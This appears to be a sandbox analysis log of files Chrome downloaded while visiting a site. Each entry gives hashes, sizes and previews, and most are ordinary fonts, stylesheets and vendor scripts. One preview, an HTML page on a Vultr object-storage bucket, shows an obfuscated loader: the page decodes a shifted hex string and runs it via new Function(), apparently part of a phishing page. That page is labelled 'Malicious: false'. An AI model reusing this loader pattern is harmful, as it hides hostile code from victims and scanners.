                                                                                        Preview:/* cyrillic-ext */.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 100 900;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v47/KFO5CnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmkC3kaWzU.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 100 900;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v47/KFO5CnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmkAnkaWzU.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 100 900;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v47/KFO5CnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmkCnkaWzU.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@f
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (3083)
                                                                                        Category:downloaded
                                                                                        Size (bytes):230925
                                                                                        Entropy (8bit):5.544441020127854
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:5350E0900BD7DB9C1F8B30139CE1E01E
                                                                                        SHA1:8798BD039826337076938FAF232EC7B20CFEB27B
                                                                                        SHA-256:B67265B28E6B023D275C7B80F35EB9066CA88BA7F280D37869DF95C5DC72A0C4
                                                                                        SHA-512:BB9A2004217E7A22F120FBA117B6C169D07FD643FECDC8D37BE1658EDFD20792AAE36C705F2B9EFC3ABEE30EB4A021F46B11C849968124B669022CA6D5D3804F
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://accounts.google.com/gsi/client
                                                                                        Preview:"use strict";this.default_gsi=this.default_gsi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0xb891000, 0x319, ]);.var aa,ba,ca,da,t,ea,ha,na,oa;aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};da=ca(this);t=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writabl
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (64424), with no line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):185452
                                                                                        Entropy (8bit):5.3843662583879395
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:99FDF149F88A085A1193A0C0E9457DBF
                                                                                        SHA1:A0C17A7EB7D21D1EB31861E54ACE06F0BDB2789B
                                                                                        SHA-256:E4503EEBD7EE7AFB148E2BF577D1241769F3AABAA98AA5BA57BD7A9E400798D8
                                                                                        SHA-512:DAE4CC0B2BEA61EC608B83872C193B501A6F00A13404FA84C017DF3F0DE66078F7FBEFF63F57770E0ACC2FFCE6E8F86C4B16F83EA1163B26DE884F90815F4401
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://do.featurebase.app/js/sdk.js
                                                                                        Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("FeaturebaseSDK",[],t):"object"==typeof exports?exports.FeaturebaseSDK=t():e.FeaturebaseSDK=t()}(this,(()=>(()=>{var e,t,i={702:(e,t)=>{var i,n,a;!function(s){if("undefined"!=typeof window){var r,o=0,l=!1,d=!1,c=7,u="[iFrameSizer]",h=u.length,f=null,p=window.requestAnimationFrame,m=Object.freeze({max:1,scroll:1,bodyScroll:1,documentElementScroll:1}),g={},v=null,y=Object.freeze({autoResize:!0,bodyBackground:null,bodyMargin:null,bodyMarginV1:8,bodyPadding:null,checkOrigin:!0,inPageLinks:!1,enablePublicMethods:!0,heightCalculationMethod:"bodyOffset",id:"iFrameResizer",interval:32,log:!1,maxHeight:1/0,maxWidth:1/0,minHeight:0,minWidth:0,mouseEvents:!0,resizeFrom:"parent",scrolling:!1,sizeHeight:!0,sizeWidth:!1,warningTimeout:5e3,tolerance:0,widthCalculationMethod:"scroll",onClose:function(){return!0},onClosed:function(){},onInit:function(){},onMessage:function(){
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with no line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):237
                                                                                        Entropy (8bit):5.205267848775554
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:6E1459072CA549CECC13A13A2403BFBD
                                                                                        SHA1:C622A9C09CFBB3EFCB4D2B61D05A51B3E6A2872A
                                                                                        SHA-256:4AAB4CC21058FE261DCC213FD46C9E18CFA4D7178610BC705BDC8A4C0416F513
                                                                                        SHA-512:C1FDA32E9A56BB1A479AA9CB0A090DA6CEA2B85A591716030DC8E04F127B2E5F0AAA244A375FB7B0506FA0D19F2787C3993D638CA4AD9D8BF65ECD4D9CD8093E
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://ewr1.vultrobjects.com/favicon.ico
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8"?><Error><Code>NoSuchBucket</Code><Message></Message><BucketName>favicon.ico</BucketName><RequestId>tx00000a3f0efef2e6f5d6f-0067be3411-6e038db4-ewr1</RequestId><HostId>6e038db4-ewr1-us</HostId></Error>
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (3877), with no line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):3877
                                                                                        Entropy (8bit):4.820854672476043
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:ADF8FBB471DD411F08FD950FB68842E5
                                                                                        SHA1:D71CC6EE1E28C215C050FCB5DCD86251BDC70481
                                                                                        SHA-256:FFFCF16201DB209800EAC808B645DA9A9C165AE7BB6A04C8F1916A842C5414D0
                                                                                        SHA-512:656EB428F8AA521364B6A9FC05CE3561439CF09316F8D6F5E7C45C247066F25BC79BDBCA03AA15977AAE3AD5192F1C6FEF135986D070C258597F1F1F4B78C8C4
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/draft-js/0.7.0/Draft.min.css
                                                                                        Preview:.DraftEditor-root,.public-DraftEditor-block{position:relative}.DraftEditor-editorContainer,.DraftEditor-root,.public-DraftEditor-content{height:inherit;text-align:initial}.DraftEditor-editorContainer{background-color:rgba(255,255,255,0);border-left:.1px solid transparent;position:relative;z-index:1}.DraftEditor-alignLeft .public-DraftStyleDefault-block{text-align:left}.DraftEditor-alignLeft .public-DraftEditorPlaceholder-root{left:0;text-align:left}.DraftEditor-alignCenter .public-DraftStyleDefault-block{text-align:center}.DraftEditor-alignCenter .public-DraftEditorPlaceholder-root{margin:0 auto;text-align:center;width:100%}.DraftEditor-alignRight .public-DraftStyleDefault-block{text-align:right}.DraftEditor-alignRight .public-DraftEditorPlaceholder-root{right:0;text-align:right}.public-DraftEditorPlaceholder-root{color:#9197a3;position:absolute;z-index:0}.public-DraftEditorPlaceholder-hasFocus{color:#bdc1c9}.DraftEditorPlaceholder-hidden{display:none}.public-DraftStyleDefault-block{po
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 6742
                                                                                        Category:dropped
                                                                                        Size (bytes):2674
                                                                                        Entropy (8bit):7.9174985179459245
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:C8BAB0298F6132CA4125E628EF35DB33
                                                                                        SHA1:0A7926AC1B4283F64CF2D6A4020FF54E5D173BEC
                                                                                        SHA-256:638919F620C132C4AE98A20746EF8AADF469D3B1D64895EE8CEFD15E34ADBA10
                                                                                        SHA-512:6E4CF8AEEE83D67EEA2592ED1867A9C5AD04FD7A0E780E2CA4E92171A56D25B698004F03863CE62C35B56E8F5938B68D1C6D6F46BC38008AFAE3D46FFE5B1736
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:...........Y.s.8..+..&.........uK.....0{{Sz..V..-ye.i6...G.G.$.3.@kK.^...kZ.9....qW.DZ4X.x.?...u.O.R!U..21.!.%$..3.E.w...l..l4&..Ri6.v..a$..WT.......iB.\..q:..,..D....(..._]..f..l.J../.;9.a....rm.!..bQi.H.]..4.a. >...L%..1.)..DDt.|..l.Wi.2...<.E.....O.O..........Y.Y..D..b.0...3NNO~z.UCvF...eO..N.%Y.y.o..L-c..e.lF.....2Jd8.%..|J...F,.....6....{..x*Xm..@..#......w.l....Y.V..WR5...e..kJf(.U.6Xm6..!..<V.{..lZ......2%Y...<G.,..N.,%.~.hMx$a.z.....J.\..Jb%..5.....v..tko.)f.ZP...gtb..3*m.NT,v&.$.[...B..a|..rpc...&,$.X.}.u..9.HZ..-.Z.[...X..W[}sn......"..1..mG...kE..T*.)..]O..N...(\..s7.,.iSJ..Me....s\.....^.$f.7$/.H..V......&3?N.."Mcj..v.k6$."..n.....n5A.<..gS...U.......P+..h....O:>>..ID.>.+Z./...PIJ....<kq.G;9. ....*.u. |~E.b.O.'.....5:vG..7...[.]%... s.9....y...!d..'.z......=.....a.....P.(q_.....5.V3..6.'.y.smP;T......;.......*..m{...RR...H..=N.V.c.A.{..x..#S..*.....m....? ...AZ...T....r...d.)..l.kK...,S..!..D.\..<b.<$".......].^.K.....h.....)&./.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 659665
                                                                                        Category:downloaded
                                                                                        Size (bytes):205343
                                                                                        Entropy (8bit):7.998093093745005
                                                                                        Encrypted:true
                                                                                        SSDEEP:
                                                                                        MD5:64850496D2A7F9CC6E344116E5861B90
                                                                                        SHA1:0358EA6A20E14F15391967DD88B3379B50585161
                                                                                        SHA-256:DDA8CEC452FF07ECA80D99CED6D255A379866FEA72F81A9A184A1244DA065C63
                                                                                        SHA-512:09BA15F82A815A389281C0348E0BAB5FDC5B85B45FEE6DB0A54C4BD488A792B62AC0CE2494A2F383DD1C20ABEA51E4DFE3708CBFD2B2F96D3A38C498A76CBEE0
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://js.intercomcdn.com/vendor.2947c1f5.js
                                                                                        Preview:...........{..8.0...).m'#.c;q.rU..M.=..i......mk"K.Iv...|...I..8Mg..{.m,Q.. .. ..?.i...F.,LX..'Q<wR?....9..0.X...V.....Lz.?.../.?\.....t.....LZ7l.p..ex.)..h~.Gb?.q.....b.........n..&..EHtf.fl.kK.'.}7..q..S..,.e..,].a.j.1.+'n.v....O:....a..m.><vN..z...c..wph..<..'......6<..x|p.92.......y3m....m.~.....f.ypb.v..........xd.4;..bf..7..](..=...7....S...B.....^..0..^.......'7~......0.]..U.1.]...o..t......1s..TE.......+W?.Z.D?<.F.{6l6...I.....u.Y.fR.X]+`.4..6..8. ...[o.....f..L..........v.........!.i....w..BA.q.pj.2`...Z......Y.....L...c.C.B..,...23....(X.C.*..XY......[..wl.o..;z......=.C...A..q.H...5.1m.3'~.y.,...z.,.c..p.p...S.....PG.p..:....$....h....3_.@.l......g...6...>..........?..-..e.>....t....oSkhM..l.Ye.<....pZ...k...{ZI."...G...%j.G...l.1.3&. ~+..D1Ez...%H.i....10.=....x.........H;8<8.O..C...'.vO."..;....H;9<....|GG.=..n.d...wr|*.......w.;._.Oz2...j9.e;m.tp...};....qp(.....:mQ.....1t.P..Zy..."...{"...........]...0R...b>.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (37675)
                                                                                        Category:dropped
                                                                                        Size (bytes):1906805
                                                                                        Entropy (8bit):5.5250983296979745
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:D5D3B7D48F1CB4A290CE7CC004E53A30
                                                                                        SHA1:B71BD6A0895F62FA019B3BA50246A3B004A6EEF8
                                                                                        SHA-256:FE32423C76F572286C5722FE60ACD3984A4482606057677E05A6A733D185BE60
                                                                                        SHA-512:4F58891F1B648DB5138D47FDED254F85C954D6B05B0DBED45E734E9C0732D53742E4ABD8BD0B89C09B9242FCD7C97201304EEC16B3FB8F81E4415728DC5F2385
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=["assets/ActivateUser.CFVvUFSP.js","assets/index.B_-yKeea.js","assets/ExclamationTriangleIcon.BNGKdN9E.js","assets/index.D3eI4jLT.css","assets/index.CLF8hfvb.js","assets/index.hMOnG-tb.css","assets/ActivateUser.sXFMIOsx.css","assets/ActiveTool.DehqpDq-.js","assets/AITools.DdDAMa67.js","assets/list-view-rectangle.CqW52iAy.js","assets/types.ClYGS8-s.js","assets/AiToolProvider.DS2zOm_j.js","assets/AiToolProvider.BNBOsyPR.css","assets/Loading.KnQROg-F.js","assets/sanitizeLatexMarkdown.DERNPJ6R.js","assets/decode.I0H7hHej.js","assets/ChatMessageInput.DJfvIKOs.js","assets/index.D1TXq2aj.js","assets/index.CpbEpqIL.css","assets/index.DzOGc9J5.js","assets/index.DyeNM4B5.js","assets/index.DKGvtgp7.js","assets/proxy.ccJnD7X4.js","assets/index.DPaONgJi.js","assets/isEmail.CmuxgFox.js","assets/YouTube.DOFcxXms.js","assets/index.es.CmVgLGF8.js","assets/ChatMessageInput.NYij0I5P.css","assets/index.DUmOG7j4.js","assets/ExportToGoogleFormsModal.YI
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (886)
                                                                                        Category:downloaded
                                                                                        Size (bytes):887
                                                                                        Entropy (8bit):4.998156549846951
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:5790DED58CBD1F2C563B371C5140EE66
                                                                                        SHA1:4BC0A86E0E70F2B15C7DF0F861ADEA6923D578D6
                                                                                        SHA-256:F66CDD145A17AAB174056C6249BCE23AB143840EB9A41C916D6C3EA644D9930C
                                                                                        SHA-512:A9C6E466855D31A27245F1CE5D0A6FBD88931A54F555A773018F9003B783BA252BAFFD0376CD20D711B025296D47F25D2CC06D0539F0534B355E3CFC47E91566
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://app.alayna.us/client/assets/index.hMOnG-tb.css
                                                                                        Preview:._label_1uvo1_1{color:var(--grayText)}._inputStyle_1uvo1_5{border:1px solid var(--grayBorder)!important;border-radius:4px;padding:8px;width:100%;background-color:var(--inputBg)!important;color:var(--inputText)!important;height:40px}._inputStyle_1uvo1_5:focus{outline:none;border:2px solid var(--accentBorder)!important}._inputStyle_1uvo1_5::-moz-placeholder{color:var(--inputPlaceholderText)}._inputStyle_1uvo1_5::placeholder{color:var(--inputPlaceholderText)}._textAreaStyle_1uvo1_26{border:1px solid var(--grayBorder)!important;border-radius:4px;padding:8px;width:100%;background-color:var(--inputBg)!important;color:var(--inputText)!important}._textAreaStyle_1uvo1_26:focus{outline:none;border:2px solid var(--accentBorder)!important}._textAreaStyle_1uvo1_26::-moz-placeholder{color:var(--inputPlaceholderText)}._textAreaStyle_1uvo1_26::placeholder{color:var(--inputPlaceholderText)}.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 315735
                                                                                        Category:downloaded
                                                                                        Size (bytes):71133
                                                                                        Entropy (8bit):7.996970099815363
                                                                                        Encrypted:true
                                                                                        SSDEEP:
                                                                                        MD5:78C38AF8A32B8A0F42D1B6CB14B5191A
                                                                                        SHA1:043360BB7BEE43EACF269C1D43578F5B18C086FE
                                                                                        SHA-256:E1D9B9F0E06D6F7DF31173D801CA479F6A438FD1B8F988FC56634C2BBA8DBA77
                                                                                        SHA-512:12AB4AC4F80D77B97C2FC7E80385B7EA7D9C3606E0740886EF573C695FDD8566E543BB6D57B518A5011441D0EC8C59B0A475155F3CA0461A84F00451D46C907E
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://js.intercomcdn.com/app~tooltips.4fe09fcc.js
                                                                                        Preview:............z.F.(..<...Q.1.......e;V.X.33^^.@..!.....h..Y...';U..@.hRTbg9^..)...ku.....U..Q...n.../....N.0..}...u+.|...0..o.....L.c.<6...=~q..H........._H"o.h....'.;...."........<.n{xs..}./.i..~..|._...~.,.1.......vT..P.t{.U..N.Q...*~.v..."....sw..v.{g.A.1...Z.Z.].:T.uwh.....b..Il.np.L....Y..0}..}./^.`)+Q.z...S;~y.....%+cl.~5...^5y...F.Q[.&k.7`..U5X....^[...P."..6.k'.c..U-^.i._....Ali.$.[..\^^..-#...4.....u.9..2......~.x.oiA........5*.............K...h..k..+...W..Y]....V.(..G..F....^..._....V.C..,w7..)t...d2......u.n.:..;...c..A.gtZm.4.......F.i4+Y..?...F..4v...c....{0vo......_....sK..E....&d.h...n..F..c...../...n.h...f..1..k..h.z....t...rTz...|#....ydTK....~....s..Q../;6...xw;6...x...:.;l7+M..1H..o...o...M...|._.7?....f. ...`...K.dt{.).Q.c..c..0.Y7....o.....G`...(..F...P7:f.Kz...,h..G........6;.....hB.Hj./....j..m.f.e....m../...7:.i.m.o..4..t..Hc.@.....^B...n.Z.u.hN....F......^.o.:p.....j....9.1..........j.0aR.~..vM......6..t..^...i
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 192 x 192, 8-bit colormap, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):1243
                                                                                        Entropy (8bit):7.583691215845505
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:D57B451B36C1116E672692F85D80C592
                                                                                        SHA1:830D9C089889653C589222070C8F513CF09561EB
                                                                                        SHA-256:7BD1E658F71C392054D92725061A2478DB33E2E77FE60750E59ECA5328469E4E
                                                                                        SHA-512:978A2D550891090537E3DE37549EB5F8761B31413227AF7D445DAA1BD0FF76DE94FBBCAA8E02EAEE2EE3BF49BDA2CDCCEC5934D70310A194A355FFE7E96BB2CD
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:.PNG........IHDR.............e..5...'PLTELiq'`.)a.(_.(`.(_.)`....Fu.......q......Jk.....tRNS..q.....u....pHYs..........{Rk...HIDATx.... .E.`.....$...l..s..S:.....:..;v..13.p.f..9...k..s(3#..(.............:./.........~.......2..q..m&P....z..)...3...7.,..c...C....E.[9.W...h.-.we`W..)..|..R.t..'.....b.>.1....d..U`X.j..s.K.y..u....Ae.4..a.j..S..{.U.."P...........{.-.....|(....... ...../.\.....E"..C....P.<O..@..cq..C....C....:$..e[.<@...Pv(..$Q.&..:4....E..$[...w...).A....$.2..P>.f"......A.D..D.D.rz.PZ. ./..k.... G.*c.._.,J...@,eVv(/....I9.........rfR...r%.,.....fw.i.p.P....p...|.. R.h.X..Q......ie....O.V.!0@..iE....O...PZ. }..@+...........o..P\. ...e...wn$.CH...CH.x....B..{7.......7*..%......q..Qb.].8..,1.C8...'.......&h.`...t.......~.m.(...-c.@.].1.....-c.@.9.......u....{..!.@.m=![.. .Y}.[.......e..h=.U.....?h.9..h..F.C...#~...@.E=.Z.. v..a....;tH.V0..w6.2...aET+.........=.....GP+......0N..?..L+...?.EL....\.j....q@..i...#[..81.0v=.84.0..I@..!.?.AB..!
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:HTML document, ASCII text, with very long lines (1662)
                                                                                        Category:downloaded
                                                                                        Size (bytes):2622
                                                                                        Entropy (8bit):5.135052604081577
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:DD7E7607304B21A40AD7537EF4544FC2
                                                                                        SHA1:7CC6081A01D859B484B5AE2B0FC192835B8D7D8F
                                                                                        SHA-256:2B41EB34569E243AC3FAD4094C9B0B1985D039CAD62D92E0CADE11E7670F8838
                                                                                        SHA-512:BB6D1819688AD1E26557126C9B46F4DB18C8E7BD3D4812726B40897279981EBF8211A7D505641A5FDACD390D157988B30D848AA4530AC447BD1A1689115DC516
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://ewr1.vultrobjects.com/palmerww/index.html
                                                                                        Preview:<html>. <head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <meta name="robots" content="noindex, nofollow">. </head>. <body>. <span hidden>The flowers bloomed beautifully in the garden.</span>. </body>.<script>.var AEHOuY = null;.if(location.hash == ""){.location.hash = ``;.AEHOuY = ``;.}.if(location.hash !== ""){.AEHOuY = location.hash;.}.if (location.hash.includes('?')) {.AEHOuY = location.hash.replace('#', '');.}.(() => {. const zNmLXr = (ILfnTv) => {. return ILfnTv.replace(/[A-Za-z]/g, (oIFlrz) => {. const SzShyX = oIFlrz <= "Z" ? 65 : 97;. return String.fromCharCode(((oIFlrz.charCodeAt(0) - SzShyX - 5 + 26) % 26) + SzShyX);. });. };. const qbhpBi = (uWjRkb) => {. let CSvOhA = '';. for (let aLtLON = 0; aLtLON < uWjRkb.length; aLtLON += 2) {. CSvOhA += String.fromCharCode(parseInt(uWjRkb.substr(aLtLON, 2), 16));. }. new Function(CSvOhA)();. };. qbhpBi(zNmLXr("766172207269"+"766572203i20"+"646k63756i65"+"6j
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (10125)
                                                                                        Category:downloaded
                                                                                        Size (bytes):10126
                                                                                        Entropy (8bit):5.156176840288941
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:B110820E7BD8286B9CA1DB712F3BEA30
                                                                                        SHA1:F58F8F52FB04E261D5A083375ACEAECAE1097A27
                                                                                        SHA-256:3DE6B195A905DA1E0CD819685895EB0BC7953BC292816C59AAACC7E72DB5F2E5
                                                                                        SHA-512:930BE76219606503FE64A305E6A15F8F10BDEF604DF94A1950ED64200A2356FDDCE61A4C3451F6975A8AB8A72F5965FD86B1405E8D42A5820D7DE8BF31834ABD
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://app.alayna.us/client/assets/Layout.CYQvu7YC.css
                                                                                        Preview:._container_195ki_1{display:flex;flex-direction:column;background:var(--color-surface);height:100%}._editorPanel_195ki_13{flex:1 1;min-height:calc(100vh - 103px)!important;max-height:calc(100vh - 103px)!important;overflow-y:scroll!important}._editor_195ki_13{border-radius:inherit;flex-grow:1;width:100%;height:100%;padding:var(--space-20)}@media (max-width: 768px){._editor_195ki_13{padding:var(--space-5)}}._editor_195ki_13:focus{outline:none}._editorContainer_195ki_39{position:relative;min-height:80%;width:100%;max-width:900px;margin:var(--space-8) auto;border:1px solid var(--color-border);background:var(--color-surface-elevated)}._placeholder_195ki_55{pointer-events:none;position:absolute;top:0;right:0;bottom:0;left:0;opacity:.3;padding:0 1em}._bubbleMenuWrapper_195ki_63{display:flex;background:var(--color-surface-elevated);gap:var(--space-2);padding:var(--space-3);box-shadow:#0f0f0f0d 0 0 0 1px,#0f0f0f1a 0 3px 6px,#0f0f0f33 0 9px 24px;border:1px solid var(--color-border);border-radius
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text
                                                                                        Category:downloaded
                                                                                        Size (bytes):2598
                                                                                        Entropy (8bit):5.38821998669564
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:7A18E3A7F0D3F68ACC4D62BA60B28935
                                                                                        SHA1:9B1FC0392AB2EDF797D8956EA77DAF088D2B883E
                                                                                        SHA-256:029DE8D59985B047F1487F4317514761360D1B6FFDD40586C630508B6DE0AC41
                                                                                        SHA-512:B238ABF24D9D8A63A06C62E0BBE1CF48B9CFCD967544005E66B48A1CC71A1DA9CF58DAF31A1150980C5CD3B976AE35CFC52D92B855C84503AEFE385D5CC3334B
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://fonts.googleapis.com/css2?family=Dancing+Script:wght@400;700&display=swap
                                                                                        Preview:/* vietnamese */.@font-face {. font-family: 'Dancing Script';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/dancingscript/v25/If2RXTr6YS-zF4S-kcSWSVi_szLviuEViw.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;.}./* latin-ext */.@font-face {. font-family: 'Dancing Script';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/dancingscript/v25/If2RXTr6YS-zF4S-kcSWSVi_szLuiuEViw.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Dancing Script';. font-style: normal;. font-weight: 400;. font-display: swap;. src
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 781133
                                                                                        Category:dropped
                                                                                        Size (bytes):182348
                                                                                        Entropy (8bit):7.998200994213297
                                                                                        Encrypted:true
                                                                                        SSDEEP:
                                                                                        MD5:D93887431E375033886E296B86177221
                                                                                        SHA1:3D9BB782C354E649EB54D06C4FF327B8F4BB8B8C
                                                                                        SHA-256:3F1259A026EAA522B4053A1177DA56BFA601981C5159BD8E98C5BCFB27D851C7
                                                                                        SHA-512:578E94D0D7824F27954F2B41AF0F75E4CDF7D1EBC36EB93A006D124DF9BEC5BE08EF103E976B660C8C29BF8BEED60F7E9CB70184E73780CDDF3BE25B11B6305B
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:............z.F. ......Q....E+..^Y..'.....4z@.HB....7K|.......].\.w......3....Z$X.....Y...F.y.U|...W.`.Fc7..2...b.+.db.v....~.../.O^....".......s.`.yw..n.G..........u......=....Ek..}.n....;.`..p.U....n.).%..^b.#._M..?.V..'.(...XT..l...gnT.:Qu..S.1...A5.......l.3.>...4[....k.-kU...,v...'...#...7..V...1w........d....^.....^.$.8..d.{.d.......?B/,~p..1X...k....x.Kg..E....{.'08....z.4..G.?.o-.w...-../.....`.$.7j.....p0.a>[;0w..F[.y.9....+.?.Y.$....7.A..t.5.~...... ......*k......m..h....v.v7..<..7...1..=.3_..L....7.v.d.}..l....nr[!p.....8=..[oP=."wi{1..g5.....y.j...Q'..~....c....v.omt.....r....M~!>...V7...;~a......e....lt".}.<.2....K@.:.m..N.%.6.T#8r=..q.v....w:...s...T..F...+iC'......]..7.pH.N(:...>.Mms..."..3....m...d...c7.Z{.s...a7.y....CO.[9.xsS...3..]..Zcr....U...@..Z2.m.x.............y...>....O...i..`.^..&..O.J.V..h.......-....;N....o."...c...".0z.E...4..2..Ie...W..].U.<..}.....FF1.\..?..q0.:.y.....l...].IxFM...1r..>.j....K..
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (953)
                                                                                        Category:downloaded
                                                                                        Size (bytes):954
                                                                                        Entropy (8bit):4.984825519661563
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:2CC51D13EE4BF58039D1F87775E463AE
                                                                                        SHA1:7EF5156428700339DF7794FAF86344E28D65E965
                                                                                        SHA-256:B51D9314E4267BED7EB77EF55B021A9853CBF4B4B6651D428A2BE6C3D94F10C1
                                                                                        SHA-512:85A195B156B3DC6E35919A9DCAB8F73CA1C95CC0D81F05E97366721FDF06F325E4D78EECB6BC8F695D165D0E0A514BA9F75DEB3E657236055CE8E8883E3655A5
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://app.alayna.us/client/assets/Auth.DgrpP85N.css
